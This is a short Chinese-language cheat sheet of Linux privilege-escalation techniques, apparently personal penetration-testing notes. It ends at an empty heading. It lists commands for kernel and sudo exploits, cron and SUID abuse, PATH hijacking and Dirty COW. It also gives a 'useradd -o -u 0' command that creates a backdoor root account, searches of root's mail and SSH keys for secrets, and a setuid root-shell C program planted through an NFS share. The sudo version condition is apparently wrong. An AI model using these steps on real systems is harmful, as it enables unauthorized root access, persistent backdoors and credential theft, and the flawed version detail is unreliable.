linux 权限提升

1.内核提权，根据版本搜索相应exp

　　查看操作系统版本命令

　　uname –a

　　lsb_release –a

　　cat /proc/version 查看内核版本

　　cat /etc/issue 查看发行类型

2.sudo提权

要求sudo版本小于1.2.28 且/etc/sudoers有用户设置

先查看/etc/sudoers配置

提权

3.计划任务提权（主要是用于权限维持）

查看计划任务  cat  /etc/crontab  /var/spool/cron(crontab –e 生成的计划任务)

如果有权限编辑则编辑计划任务的相应脚本。

Crontab –e 编写提权文件

4. suid提权

find / -user root –perm -4000 print 2>/dev/null    //这里是find bash vim less more cp mv 等命令（因为这些命令有执行系统命令的参数，主要查看是否具有s权限）

5.环境变量劫持提权（当可执行文件执行的命令时，从当前开始寻找需要的参数。//这里是ps）

1. 寻找suid的文件

　　　find / -user root –perm -4000 print 2>/dev/null

当前文件夹创建ps，添加/bin/sh到ps中，shell为demo.c编译后的文件，当运行shel后，shel会从当前环境目录寻找到ps并调用，达到提权的目的。

6. 脏牛提权

1.下载脏牛exp，生成可执行文件

2. 执行文件，查看权限

mv /tmp/passwd.bak /etc/passwd 备份后还原root账号

useradd -p 123456 db -o -u 0 -g root 创建root权限账号

7.根据服务提权，攻击高权限运行的服务获取权限

ps –aux | grep root

ps –ef | grep root

dpkg –l  查看安装的应用程序

8.查看文件中的弱密码

grep –i pass filename

/var/spool/mail/root 查看用户是否存在敏感信息信息

/root/.ssh 查看秘钥信息

9.利用NFS获取权限

1. cat /etc/exports

2.  当前为任意机器可连接，攻击机挂载（kali用nfs-common,centos用nfsutil ）

　　  showmount 192.168.83.134 查看

　　  mount -t nfs 192.168.83.134:/tmp /tmp/test 挂载（/tmp共享的）

　　 3. 创建.c文件，上传到共享（若配置不安全可以附加权限 suid类似）

　　  4.要提权服务器执行文件

2.c

　　  #include <stdio.h>

　　  #include <stdlib.h>

　　  #include <sys/types.h>

　　  #include <unistd.h>

　　  int main(){

　　  setuid(0);

　　  system("/bin/bash");

　　  return 0;

　　  }

10.通配符注入（chown）